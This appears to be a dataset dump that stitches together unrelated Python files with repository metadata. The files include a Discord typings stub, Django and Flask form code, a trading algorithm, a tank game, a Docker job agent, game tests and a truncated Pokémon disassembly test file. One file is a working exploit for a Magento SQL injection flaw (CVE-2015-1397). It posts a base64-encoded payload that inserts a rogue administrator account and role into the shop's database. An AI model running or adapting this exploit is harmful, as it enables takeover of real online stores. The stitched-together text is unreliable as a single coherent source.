"2023-09-11T20:15:37"
"2021-08-28T16:18:37"
"2023-09-11T14:24:43"
"2023-09-11T20:15:36"
15,833
2,540
433
93
Python
false
false
""" discord.types ~~~~~~~~~~~~~~ Typings for the Discord API :copyright: (c) 2015-2021 Rapptz & (c) 2021-present Pycord Development :license: MIT, see LICENSE for more details. """
UTF-8
Python
false
false
183
py
126
__init__.py
79
0.666667
0.601093
0
9
19.333333
70
mygit2014/vulnexipy
1,889,785,645,290
c3685fe893985e37b544d2340587e1a515291041
5508a6634049bc83627f65337c1070c8f4c6d2e0
/cve_2015_1397.py
f7b9742bd9b0324875c13ebb2095dca1ab1425c1
[]
no_license
https://github.com/mygit2014/vulnexipy
6163e5e77724a4be5babf8afd76f4be5143c5845
c7dc0d4dabf48893baf0dc5c7b614cc62b5016e8
refs/heads/master
"2023-04-21T10:45:56.438000"
"2021-05-10T10:38:26"
"2021-05-10T10:38:26"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import requests import sys import base64 import argparse from log_colors import * # SQL injection vulnerability in the getCsvFile # function in the Mage_Adminhtml_Block_Widget_Grid # class in Magento Community Edition (CE) 1.9.1.0 # and Enterprise Edition (EE) 1.14.1.0 # allows remote administrators to execute arbitrary # SQL commands via the popularity[field_expr] # parameter when the popularity[from] or popularity[to] parameter is set. class CVE2015_1397: def __init__(self, url, user, pswd): print (LogColors.BLUE + "victim: " + url + "..." + LogColors.ENDC) self.url = url self.user, self.pswd = user, pswd self.session = requests.Session() def exploit(self): print (LogColors.BLUE + "exploitation..." + LogColors.ENDC) q = "SET @SALT = 'rp';" q += "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{passwd}')".format(passwd = self.pswd) q += " ), CONCAT(':', @SALT ));" q += "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;" q += "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`," q += "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`," q += "`rp_token_created_at`) " q += "VALUES ('Firstname','Lastname','hacked@hack.com','{user}',".format(user = self.user) q += "@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());" q += "INSERT INTO `admin_role` (parent_id,tree_level,sort_order," q += "role_type,user_id,role_name) " q += "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username =" q = q.replace("\n", "") q += " '{user}'),'Firstname');".format(user = self.user) pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(q) print (LogColors.YELLOW + pfilter + "..." + LogColors.ENDC) data = { "___directive" : "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", "filter" : base64.b64encode(pfilter.encode()).decode(), "forwarded" : 1 } r = self.session.post( self.url.rstrip("/") + "/index.php/admin/Cms_Wysiwyg/directive/index/", data = data ) if r.ok: print (LogColors.YELLOW + "auth: " + self.user + ":" + self.pswd + LogColors.ENDC) print (LogColors.GREEN + "successfully send payload. hacked :)" + LogColors.ENDC) else: print (LogColors.RED + "sending payload failed :(" + LogColors.ENDC) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', required = True, help = "target url") parser.add_argument('-user','--username', required = True, help = "auth username") parser.add_argument('-pswd','--password', required = True, help = "auth password") args = vars(parser.parse_args()) url = args["url"] user, pswd = args["username"], args["password"] cve = CVE2015_1397(url, user, pswd) cve.exploit()
UTF-8
Python
false
false
3,042
py
87
cve_2015_1397.py
83
0.60092
0.583498
0
64
46.515625
114
georgecai904/directconnect
2,173,253,453,747
f4ab26c97aa5f8e894145f10f9bb97de079ffc3d
d7d8a8b8ba443538db5465f21e1f0771c5f77d2e
/core/tests/test_sign_up.py
8e51b7f5f008ca331d55dd4df1b7e67bba7bffa1
[]
no_license
https://github.com/georgecai904/directconnect
cbe8462c166394d47d830633b2f460c4ec1b552b
30c59ea4beda330cca313e9274261cc2e8bc5cde
refs/heads/master
"2021-04-19T00:57:34.798000"
"2017-07-12T14:40:20"
"2017-07-12T14:40:20"
94,593,817
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.test import TestCase
from core.forms import NewUserForm
from django.contrib.auth.models import User


class AuthTest(TestCase):
    def test_sign_up(self):
        data = {
            "username": "georgecai904",
            "password": "testpassword",
            "email": "mail@georgecai.com"
        }
        NewUserForm(data).save()
        self.assertEqual(User.objects.count(), 1)
UTF-8
Python
false
false
400
py
55
test_sign_up.py
35
0.6225
0.6125
0
14
27.571429
49
AboveColin/Webtechnologie_Project
2,130,303,791,987
79cbbdec93ca9c1682af74834effe370c4cd51ff
27aeefb14007ba389d937dfbe79eae09226db056
/stage/forms.py
e3e40f452d0084470868a0f50b1e75f2d0e4e3c6
[]
no_license
https://github.com/AboveColin/Webtechnologie_Project
bf97041c6d397e9acd19d627c05c271cf3766e48
ef1462c1243aa212438c77ad04b3479daa18b230
refs/heads/main
"2023-07-18T23:11:49.809000"
"2021-09-20T09:02:16"
"2021-09-20T09:02:16"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, SelectField
from wtforms.validators import data_required, Email, EqualTo
from wtforms import ValidationError
from stage.models import User, Begeleider


# A form where a user can login using a submit button, his username and password.
class Loginform(FlaskForm):
    username = StringField("Gebruikersnaam", validators=[data_required()])
    password = PasswordField("Wachtwoord", validators=[data_required()])
    submit = SubmitField("Inloggen")


# A form where you can register as a user
class Registratie(FlaskForm):
    email = StringField("E-mailadres", validators=[data_required(), Email()])
    voornaam = StringField("Voornaam", validators=[data_required()])
    achternaam = StringField("Achternaam", validators=[data_required()])
    username = StringField("Gebruikersnaam", validators=[data_required()])
    password = PasswordField("Wachtwoord", validators=[data_required(), EqualTo("pass_confirm", message="Wachtwoorden komen niet overeen")])
    pass_confirm = PasswordField("Bevestig wachtwoord", validators=[data_required()])
    submit = SubmitField("Registreer")
UTF-8
Python
false
false
1,201
py
19
forms.py
7
0.741049
0.741049
0
22
52.409091
140
decayboy/Lean.Algorithms
11,106,785,430,372
a1b646f2cd56db07f4df24173cdfed201097f7b6
3aa19b823a911968725605dd6d2019b92e96a477
/Python/GoogleTrends.py
c3e376b65ae40d03381f8ee6168b701dfb4db63e
[ "Apache-2.0" ]
permissive
https://github.com/decayboy/Lean.Algorithms
884c08dd1a23a4bebc75df1aa7bf298c85248126
0109addf768fea511ffb05ef164653797d097245
refs/heads/master
"2020-04-15T02:54:34.925000"
"2019-01-20T06:25:29"
"2019-01-20T06:25:29"
164,328,522
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pandas as pd
import numpy as np
from datetime import timedelta

### <summary>
### Utilizes the monthly Google trends search term "debt" to anticipate potential price movements.
### Contrast other search terms and assets to produce interesting results.
### </summary>
class BasicTemplateAlgorithm(QCAlgorithm):
    '''Basic template algorithm simply initializes the date range and cash'''

    def Initialize(self):
        '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''

        self.SetBrokerageModel(BrokerageName.InteractiveBrokersBrokerage)
        self.SetBenchmark("SPY")
        self.SetStartDate(2009,12, 1)  #Set Start Date
        self.SetEndDate(2018,8,18)     #Set End Date
        self.SetCash(100000)           #Set Strategy Cash
        self.equity = ['SPY', 'IEF']
        self.months = {}

        # Find more symbols here: http://quantconnect.com/data
        self.AddEquity(self.equity[0], Resolution.Hour)
        self.AddEquity(self.equity[1], Resolution.Hour)

        self.google_trends = pd.DataFrame(columns=['Week', 'interest'])
        self.file = self.Download("https://www.dropbox.com/s/lzah401ulb8cdba/debtMonthly.csv?dl=1")
        self.file = self.file.split("\n")

        i = 0
        for row in self.file[1:]:
            one_row = row.split(",")
            self.google_trends.loc[i] = one_row
            i += 1

        self.google_trends["MA3"] = self.google_trends.interest.rolling(3).mean()
        self.google_trends["MA18"] = self.google_trends.interest.rolling(18).mean()
        self.google_trends["Signal"] = self.google_trends["MA3"].astype('float') - self.google_trends["MA18"].astype('float')
        self.google_trends["Signal"] = self.google_trends["Signal"].shift(1)

    def OnData(self, data):
        '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.

        Arguments:
            data: Slice object keyed by symbol containing the stock data
        '''
        date_today = self.Time.date()
        date_today = date_today.strftime(format='%Y-%m-%d')
        date_today = date_today[0:7]

        signal = self.google_trends.loc[self.google_trends.Week == date_today,"Signal"].iloc[0]

        try:
            invested = self.months[date_today]
        except:
            invested = "No"

        if self.Time.hour == 15 and invested == "No":

            if self.Portfolio[self.equity[0]].Quantity > 0 and signal > 0:
                self.Liquidate(self.equity[0])
            if self.Portfolio[self.equity[1]].Quantity > 0 and signal < 0:
                self.Liquidate(self.equity[1])

            if signal < 0 and self.Portfolio[self.equity[0]].Quantity == 0:
                self.SetHoldings(self.equity[0], 1)
                self.months[date_today] = "Yes"
                return

            if signal > 0 and self.Portfolio[self.equity[1]].Quantity == 0:
                self.SetHoldings(self.equity[1], 1)
                self.months[date_today] = "Yes"
                return
UTF-8
Python
false
false
3,141
py
2
GoogleTrends.py
1
0.610315
0.590258
0
68
45.191176
151
marcenavuc/battle_city
13,700,945,710,554
9ef0f7027bed2c91dfbe9fe9bddfd8a3b6cc9c14
17dfa7fc4e5a37fb2ef8d67126c2a633a1210a9e
/battle_city/game_objects/tanks.py
f0f21e9c414cad894fc04b86397efefb5d8e3931
[]
no_license
https://github.com/marcenavuc/battle_city
c404c528ebb3f273f1aa2d4ac91acf8891fb52da
75c164d73b6d060fbb4a052fad41fcfafc5687f1
refs/heads/main
"2023-02-10T00:31:57.629000"
"2020-12-30T15:38:18"
"2020-12-30T15:38:18"
305,317,156
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import logging
import random
import time

import pygame

from battle_city.config import RESPAWN_TIME
from battle_city.game_objects import Missile
from battle_city.game_objects.game_object import Directions, Movable,\
    GameObject

logger = logging.getLogger(__name__)


class Tank(Movable):
    image = "media/images/tank.png"

    def __init__(self, position, direction=Directions.UP, *args, **kwars):
        super().__init__(position, *args, **kwars)
        self.velocity = 5
        self.health = 1
        self.speed = 5
        self.is_shot = False
        self.period_duration = RESPAWN_TIME / 8
        self.time_of_creation = time.time()

    def set_position(self, position: pygame.rect.Rect, level) \
            -> pygame.rect.Rect:
        if self.is_collidelist(position, level.floor) >= 0:
            self.speed = self.velocity / 2
        else:
            self.speed = self.velocity

        if (
            self.in_borders(position, level)
            and self.is_collidelist(position, level.walls) < 0
            and self.is_collidelist(position, level.blocks) < 0
        ):
            return position
        return self.rect

    def shot(self, level):
        missile_position = self.move(self.direction, speed=25)
        if self.is_shot and missile_position.colliderect(missile_position):
            missile = Missile(missile_position, self.direction)
            level.missiles.append(missile)


class EnemyTank(Tank):
    image = "media/images/tank.png"

    def __init__(self, position, *args, **kwars):
        super().__init__(position, *args, **kwars)

    def update(self, event: pygame.event, level, *args):
        if abs(self.time_of_creation - time.time()) < self.period_duration:
            self.random_walk(level)
        elif abs(self.time_of_creation - time.time()) < 2*self.period_duration:
            self.move_to_obj(level.player, level)
        else:
            self.move_to_obj(level.command_center, level)

    def random_walk(self, level):
        rand_number = random.randint(1, 1000)
        direction = self.direction
        if rand_number < 100:
            direction = Directions.random_direction()
        if rand_number < 50:
            self.shot(level)

        new_position = self.move(direction)
        self.rect = self.set_position(new_position, level)

    def move_to_obj(self, obj: GameObject, level):
        direction = self.direction
        if self.rect.y + self.speed < obj.rect.y:
            direction = Directions.DOWN
        elif self.rect.y - self.speed > obj.rect.y:
            direction = Directions.UP
        elif self.rect.x - self.speed < obj.rect.x:
            direction = Directions.RIGHT
        elif self.rect.x + self.speed > obj.rect.x:
            direction = Directions.LEFT

        new_position = self.move(direction)
        print(self.rect, new_position)
        new_rect = self.set_position(new_position, level)
        if self.rect == new_rect:
            logger.debug("Didn't found the way")
            self.period_duration *= 2
        else:
            self.rect = new_rect


class SpeedTank(EnemyTank):
    image = "media/images/tank.png"

    def __init__(self, position, *args, **kwars):
        super().__init__(position, *args, **kwars)
        self.speed = 10


class HeavyTank(EnemyTank):
    image = "media/images/heavy_tank.png"

    def __init__(self, position, *args, **kwars):
        super().__init__(position, *args, **kwars)
        self.speed = 2
        self.health = 3


class RushTank(EnemyTank):
    image = "media/images/rush_tank.png"

    def __init__(self, position, *args, **kwars):
        super().__init__(position, *args, **kwars)
        self.speed = 5

    def update(self, event: pygame.event, level, *args):
        self.move_to_obj(level.command_center, level)
UTF-8
Python
false
false
3,806
py
35
tanks.py
26
0.602995
0.595901
0
119
30.983193
79
JMHOO/planet-insight
4,629,974,775,692
5e98067d0ebf3f4aa3ecd7ba12eb83f53db5a6a0
79659f16658fadd105295497c84193b8017eb68a
/package/insight/agent.py
5042c0db4bd7853f0e484860558230ad6706fb34
[]
no_license
https://github.com/JMHOO/planet-insight
13a0652849f1c2b08d8a9b7968c24a4085b04ff8
d2a40459b3d2bdd5bfedb8f3707e19bc5e2e7678
refs/heads/master
"2021-09-11T00:54:29.128000"
"2018-04-05T05:09:32"
"2018-04-05T05:09:32"
103,308,427
3
2
null
false
"2018-04-05T05:09:33"
"2017-09-12T18:46:05"
"2018-01-12T01:43:54"
"2018-04-05T05:09:33"
436
2
1
1
JavaScript
false
null
from .storage import DBJobInstance, DBWorker import docker import platform import threading from random import randint from time import sleep from simple_settings import LazySettings import os settings = LazySettings('insight.applications.settings') class LocalDockerRunner(): def __init__(self, cli, gpu_count, image_name, volumes, commands, environments=None): self.docker = cli self.gpu_count = gpu_count self.image_name = image_name self.volumes = volumes self.commands = commands self.environments = environments self.containerId = "" self._t = None self.volumes = {"nvidia_driver_384.98": "/usr/local/nvidia"} self._reportor = DBWorker() def start(self): self._t = threading.Thread(target=self.run_container) self._t.start() def is_container_running(self): for container in self.docker.containers(all=False): if container['Id'] == self.containerId: return True return False def __del__(self): if self._t: self._t.join() def run_container(self): commands = '' if self.commands: commands = 'bash -c "' + self.commands + '"' binds = [] for s, d in self.volumes.items(): binds.append(s + ":" + d) volumes = list(self.volumes.values()) devices = ["/dev/nvidiactl:/dev/nvidiactl", "/dev/nvidia-uvm:/dev/nvidia-uvm"] for i in range(self.gpu_count): devices.append("/dev/nvidia{}:/dev/nvidia{}".format(i, i)) host_config = self.docker.create_host_config(devices=devices, binds=binds) response = self.docker.create_container( image=self.image_name, volumes=volumes, command=commands, environment=self.environments, host_config=host_config) if response['Warnings'] is None: self.containerId = response['Id'] else: print(response['Warnings']) return self.docker.start(self.containerId) print('Container {} started, waiting to finish...'.format(self.containerId)) # Keep running until container is exited while self.is_container_running(): sleep(1) self._reportor.report(platform.node(), system_info="{}", status='training') # Remove the container when it is finished self.docker.remove_container(self.containerId) print('Container exited') class AgentService(threading.Thread): def __init__(self, gpu_count=1): super().__init__() self.stoprequest = threading.Event() self.gpu_count = gpu_count self.worker_name = platform.node() def stop(self, timeout=None): self.stoprequest.set() super().join(timeout) def run(self): print('INFO::Agent service started.') try: aws_key = os.environ['AWS_ACCESS_KEY_ID'] aws_access = os.environ['AWS_SECRET_ACCESS_KEY'] aws_region = os.environ['AWS_DEFAULT_REGION'] except KeyError: print('ERROR::AWS credential not configed, exit.') return # docker instance self._docker = None try: if platform.system() is 'Windows': self._docker = docker.APIClient(base_url='npipe:////./pipe/docker_engine') else: self._docker = docker.APIClient(base_url='unix:///var/run/docker.sock') except: self._docker = None if self._docker is None: print('ERROR::No docker engine installed, abort!') return print('INFO::Connected to docker engine.') self._jobs = DBJobInstance() self._reportor = DBWorker() while not self.stoprequest.is_set(): random_sleep = randint(3, 10) # do job checking new_job = self._jobs.check_new_job() if new_job is not None: print('Got new jog: {}'.format(new_job)) pretrain_weights = '-w ' + new_job['pretrain'] #if pretrain_weights != 'NONE': # pretrain_weights = '-w ' + pretrain_weights #else: # pretrain_weights = '' monitor_service = settings.MONITOR['HOST'] + settings.MONITOR['PATH'] command = '/home/root/insight/run_worker.sh -i {} -m {} {} -d {} -s {}'.format( new_job['instance_name'], new_job['model_name'], 
pretrain_weights, new_job['dataset_name'], monitor_service ) print(command) environment = { 'AWS_ACCESS_KEY_ID': aws_key, 'AWS_SECRET_ACCESS_KEY': aws_access, 'AWS_DEFAULT_REGION': aws_region } self._reportor.report(platform.node(), system_info="{}", status='preparing') # do job and waiting runner = LocalDockerRunner( self._docker, self.gpu_count, settings.DOCKER['IMAGE'] + ':' + settings.DOCKER['VERSION'], volumes=None, commands=command, environments=environment ) # since we already in a thread, call block function instead of start another thread runner.run_container() # sleep random seconds between 3 ~ 10 print('INFO::No job, waiting {} seconds'.format(random_sleep)) self._reportor.report(platform.node(), system_info="{}", status='idle') sleep(random_sleep)
UTF-8
Python
false
false
5,755
py
61
agent.py
49
0.550304
0.548045
0
167
33.45509
127
Bibek-Bhandari/argument-mining-assignment
19,430,432,073,296
536d6d45526ee94b3f6b9bb8a0c1a847b25af466
6329df89021c2adf5f12f44a503bb415db58f9b7
/argument-mining-assignment/code/evaluation.py
6a06b7c21569e9cc38f54c4d79aa44788c8d3e7e
[]
no_license
https://github.com/Bibek-Bhandari/argument-mining-assignment
dae14e26863f317f156157a332e9c81f69db727d
13587b43cde29f3e5d0565b49b831a1fb8ace3c8
refs/heads/master
"2022-10-17T10:54:56.720000"
"2020-05-29T17:16:11"
"2020-05-29T17:16:11"
266,842,567
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import argparse
from sklearn.metrics import f1_score


def evaluation(path_to_ground_truth_bio, path_to_pred_bio):
    '''
    Computing F1-score for each of the major-claim, claim, premises, and non-argumentative classes
    '''
    # read token/tag pairs from the ground-truth file and from the prediction file
    gt_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n']
    pred_bio = [x.split('\t') for x in open(path_to_pred_bio).readlines() if x !='\n']

    assert len(gt_bio) == len(pred_bio), 'Number of tokens in the prediction file is different than the ground truth.'

    #F1-score overall tokens..
    _, gt_y = zip(*gt_bio)
    _, pred_y = zip(*pred_bio)

    overall_f1_score = f1_score(gt_y, pred_y, average='macro')
    print('F1-SCORE: ', overall_f1_score )


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Evaluate your approach')
    parser.add_argument('--gt_bio_path')
    parser.add_argument('--pred_bio_path')
    args = parser.parse_args()

    evaluation(args.gt_bio_path, args.pred_bio_path)
UTF-8
Python
false
false
1,015
py
6
evaluation.py
5
0.649261
0.642365
0
31
31.741935
118
pandrian75/pastiche
14,645,838,516,754
35149e7df278e3a0dcebb329d51dc33ebd6490b2
f3fd212093c372ba4da2ef3644eb65bf454616ba
/populate_db.py
3f4be66a3e394b0739de4abf622aa7a3e1e565b0
[]
no_license
https://github.com/pandrian75/pastiche
00ffb57fc5bba97aa190a44f59257b124e18a5fa
0422dd6fed6f7d5660256be602eade00b0f35d53
refs/heads/master
"2016-08-09T14:33:17.180000"
"2008-07-31T07:53:16"
"2008-07-31T07:53:16"
50,779,665
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import pastiche import os os.environ['DJANGO_SETTINGS_MODULE'] = 'pastiche.settings' from datetime import datetime from dada.models import Item, Event, Link, Location, Note, Tag, Task from django.contrib.auth.models import User def empty_table(table): for o in table.objects.all(): o.delete() ##empty_table(Item) ##empty_table(Node) #empty_table(Note) #empty_table(Link) #empty_table(Location) #empty_table(Tag) ##empty_table(Task) # TODO: probably need to delete according to hierarchy, recursively ##empty_table(Event) # TODO: same u1 = User.objects.get(username='andre') t1 = Task() t1.title = 'first task' t1.user = u1 t1.save() t2 = Task() t2.user = u1 t2.parent = t1 t2.title = 'second task' t2.save() t3 = Task() t3.user = u1 t3.parent = t1 t3.title = 'third task' t3.due = datetime.now() t3.save() t4 = Task() t4.user = u1 t4.parent = t2 t4.title = 'fourth task' t4.done = True t4.save() e1 = Event() e1.title = 'first event' e1.user = u1 e1.rating = 4 e1.start = datetime.now() e1.stop = datetime(2008, 10, 31, 12, 34, 56) e1.save() e2 = Event() e2.title = 'second event' e2.user = u1 e2.rating = 2 e2.start = datetime.now() e2.stop = datetime(2008, 10, 31, 12, 34, 56) e2.save() e3 = Event() e3.title = 'first subevent' e3.user = u1 e3.parent = e2 e3.start = datetime.now() e3.stop = datetime(2008, 9, 18, 12, 34, 56) e3.save() e4 = Event() e4.title = 'second subevent' e4.user = u1 e4.parent = e2 e4.start = datetime(2008, 9, 18, 12, 34, 56) e4.stop = datetime(2008, 10, 31, 12, 34, 56) e4.save() l1 = Link() l1.title = 'first link' l1.user = u1 l1.private = True l1.url = 'http://pastiche.info' l1.save() n1 = Note() n1.title = 'first note' n1.user = u1 n1.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n1.owner = l1 # add owner to note n1.save() n2 = Note() n2.title = 'second note' n2.user = u1 n2.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n2.save() l2 = Link() l2.title = 'second link' l2.user = u1 l2.private = True l2.url = 'http://pastiche.info' l2.save() l2.annotations.add(n2) # add note to owner (after save!) l3 = Link() l3.title = 'third link' l3.user = u1 l3.url = 'http://pastiche.info' l3.owner = t1 l3.save() l4 = Link() l4.title = 'fourth link' l4.user = u1 l4.url = 'http://pastiche.info' l4.owner = t1 l4.save() l5 = Link() l5.title = 'fifth link' l5.user = u1 l5.url = 'http://pastiche.info' l5.save() n3 = Note() n3.title = 'third note' n3.user = u1 n3.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n3.owner = t1 n3.save() n4 = Note() n4.title = 'fourth note' n4.user = u1 n4.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n4.owner = t3 n4.save() n5 = Note() n5.title = 'fifth note' n5.user = u1 n5.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n5.owner = e2 n5.save() n6 = Note() n6.title = 'sixth note' n6.user = u1 n6.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n6.owner = e4 n6.save() n7 = Note() n7.title = 'seventh note' n7.user = u1 n7.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n7.save() n8 = Note() n8.title = 'eighth note' n8.user = u1 n8.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' 
n8.owner = l5 n8.save() h1 = Item() h1.user = u1 h1.title = 'Bookmarks' h1.save() l6 = Link() l6.title = 'first bookmark' l6.user = u1 l6.url = 'http://pastiche.info' l6.parent = h1 l6.save() l7 = Link() l7.title = 'second bookmark' l7.user = u1 l7.url = 'http://pastiche.info' l7.parent = h1 l7.save() h2 = Item() h2.user = u1 h2.title = 'More Bookmarks' h2.parent = h1 h2.save() l8 = Link() l8.title = 'third bookmark' l8.user = u1 l8.url = 'http://pastiche.info' l8.parent = h2 l8.save() l9 = Link() l9.title = 'fourth bookmark' l9.user = u1 l9.url = 'http://pastiche.info' l9.parent = h2 l9.save() print 'db populated.' ### #t = SimpleTask() #t.title = 'first task' #t.done = False #t.save() #n = SimpleNote() #n.title = 'first note' #n.text = "just some text for this note." #n.owner = t #n.save() ##t.annotations.add(n) #n.owner #n.owner.title #t.notes #t.notes.count() #t.notes.all()[0].title
UTF-8
Python
false
false
4,582
py
14
populate_db.py
6
0.639241
0.579005
0
228
18.096491
93
fran757/tdlog
2,516,850,876,334
21cab59ab42aacf10e899abbcccb6f43b42c65e0
477f1c24269b0c6f4a2ae58569bcb2d21b07a2d2
/test_game.py
5653216af8cf36705011d864c66c3d66144e4d66
[]
no_license
https://github.com/fran757/tdlog
9a9f368ad3fe1e798f3a2770e03f529e5fa7a5b4
74f7b2251de916f3dc870aacd7d701e599004c5d
refs/heads/master
"2022-04-06T02:25:18.065000"
"2020-02-04T10:21:20"
"2020-02-04T10:21:20"
218,588,437
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os
import unittest

from model import Grid
from control import Game


def fixture_name(name):
    """return appropriate filename"""
    return os.getcwd() + "/fixtures/" + name + ".txt"


def build_fixture(name):
    """build game from fixture name"""
    return Game(Grid(fixture_name(name)), None)


def extract_fixture(name):
    """extract fixture data"""
    data = []
    with open(fixture_name(name)) as fixture:
        for line in fixture:
            data.append(line)
    return data


def repr_fixture(name):
    """return repr of fixture"""
    with open(fixture_name(name)) as fixture:
        return "".join(["".join(line) for line in fixture])


def write_fixture(data):
    """write fixture to tmp file"""
    with open(fixture_name("tmp"), "w") as tmp_file:
        print(data, file=tmp_file)


def expectation(move, expected):
    """Give fixture comparison result and related error message."""
    value = extract_fixture("tmp") == extract_fixture(expected)
    message = "Grid is not as expected after {} :\n".format(move) + repr_fixture("tmp")
    return value, message


class GlobalTest(unittest.TestCase):
    def test_all(self):
        """tests :
        moving to empty cell
        moving into cell
        switching character
        turning turnstile
        blocked turnstile
        pushing crate into hole
        falling into hole
        """
        self.game = build_fixture("../model/grid")
        move = "1vv2^>3>>>"
        self.game.process_input(move)
        write_fixture(str(self.game.grid))
        self.assertTrue(*expectation(move, "global"))


if __name__ == "__main__":
    unittest.main()
UTF-8
Python
false
false
1,648
py
16
test_game.py
15
0.621966
0.620146
0
64
24.75
87
kanzure/pokecrystal-demo
386,547,101,625
b1a1a3a31aa41d6534dd4c81b67284836e479d71
77aef3246236c192850e419eb04c6fae0a7697ba
/extras/tests.py
61f46d6cb8d6f8f859f6b5682bd2c0dc608efe5e
[]
no_license
https://github.com/kanzure/pokecrystal-demo
ce61540f8d0fff4ddd253d15f9718201ef838b23
9ec5b0d12b1b3c0e164cb41cca8442989b3ada66
refs/heads/master
"2016-09-06T21:34:58.619000"
"2013-05-16T13:58:10"
"2013-05-16T13:58:10"
9,989,839
3
2
null
false
"2013-05-16T13:58:11"
"2013-05-10T20:33:17"
"2013-05-16T13:58:10"
"2013-05-16T13:58:10"
404
null
7
5
Assembly
null
null
# -*- coding: utf-8 -*- import os import sys import inspect from copy import copy import hashlib import random import json from interval_map import IntervalMap from chars import chars, jap_chars from romstr import ( RomStr, AsmList, ) from item_constants import ( item_constants, find_item_label_by_id, generate_item_constants, ) from pointers import ( calculate_bank, calculate_pointer, ) from pksv import ( pksv_gs, pksv_crystal, ) from labels import ( remove_quoted_text, line_has_comment_address, line_has_label, get_label_from_line, ) from crystal import ( rom, load_rom, rom_until, direct_load_rom, parse_script_engine_script_at, parse_text_engine_script_at, parse_text_at2, find_all_text_pointers_in_script_engine_script, SingleByteParam, HexByte, MultiByteParam, PointerLabelParam, ItemLabelByte, DollarSignByte, DecimalParam, rom_interval, map_names, Label, scan_for_predefined_labels, all_labels, write_all_labels, parse_map_header_at, old_parse_map_header_at, process_00_subcommands, parse_all_map_headers, translate_command_byte, map_name_cleaner, load_map_group_offsets, load_asm, asm, is_valid_address, index, how_many_until, grouper, get_pokemon_constant_by_id, generate_map_constant_labels, get_map_constant_label_by_id, get_id_for_map_constant_label, calculate_pointer_from_bytes_at, isolate_incbins, process_incbins, get_labels_between, generate_diff_insert, find_labels_without_addresses, rom_text_at, get_label_for, split_incbin_line_into_three, reset_incbins, ) # for testing all this crap try: import unittest2 as unittest except ImportError: import unittest # check for things we need in unittest if not hasattr(unittest.TestCase, 'setUpClass'): sys.stderr.write("The unittest2 module or Python 2.7 is required to run this script.") sys.exit(1) class TestCram(unittest.TestCase): "this is where i cram all of my unit tests together" @classmethod def setUpClass(cls): global rom cls.rom = direct_load_rom() rom = cls.rom @classmethod def tearDownClass(cls): del cls.rom def test_generic_useless(self): "do i know how to write a test?" 
self.assertEqual(1, 1) def test_map_name_cleaner(self): name = "hello world" cleaned_name = map_name_cleaner(name) self.assertNotEqual(name, cleaned_name) self.failUnless(" " not in cleaned_name) name = "Some Random Pokémon Center" cleaned_name = map_name_cleaner(name) self.assertNotEqual(name, cleaned_name) self.failIf(" " in cleaned_name) self.failIf("é" in cleaned_name) def test_grouper(self): data = range(0, 10) groups = grouper(data, count=2) self.assertEquals(len(groups), 5) data = range(0, 20) groups = grouper(data, count=2) self.assertEquals(len(groups), 10) self.assertNotEqual(data, groups) self.assertNotEqual(len(data), len(groups)) def test_direct_load_rom(self): rom = self.rom self.assertEqual(len(rom), 2097152) self.failUnless(isinstance(rom, RomStr)) def test_load_rom(self): global rom rom = None load_rom() self.failIf(rom == None) rom = RomStr(None) load_rom() self.failIf(rom == RomStr(None)) def test_load_asm(self): asm = load_asm() joined_lines = "\n".join(asm) self.failUnless("SECTION" in joined_lines) self.failUnless("bank" in joined_lines) self.failUnless(isinstance(asm, AsmList)) def test_rom_file_existence(self): "ROM file must exist" self.failUnless("baserom.gbc" in os.listdir("../")) def test_rom_md5(self): "ROM file must have the correct md5 sum" rom = self.rom correct = "9f2922b235a5eeb78d65594e82ef5dde" md5 = hashlib.md5() md5.update(rom) md5sum = md5.hexdigest() self.assertEqual(md5sum, correct) def test_bizarre_http_presence(self): rom_segment = self.rom[0x112116:0x112116+8] self.assertEqual(rom_segment, "HTTP/1.0") def test_rom_interval(self): address = 0x100 interval = 10 correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce', '0xed', '0x66', '0x66', '0xcc', '0xd'] byte_strings = rom_interval(address, interval, strings=True) self.assertEqual(byte_strings, correct_strings) correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13] ints = rom_interval(address, interval, strings=False) self.assertEqual(ints, correct_ints) def test_rom_until(self): address = 0x1337 byte = 0x13 bytes = rom_until(address, byte, strings=True) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == '0xd5') bytes = rom_until(address, byte, strings=False) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == 0xd5) def test_how_many_until(self): how_many = how_many_until(chr(0x13), 0x1337) self.assertEqual(how_many, 3) def test_calculate_bank(self): self.failUnless(calculate_bank(0x8000) == 2) self.failUnless(calculate_bank("0x9000") == 2) self.failUnless(calculate_bank(0) == 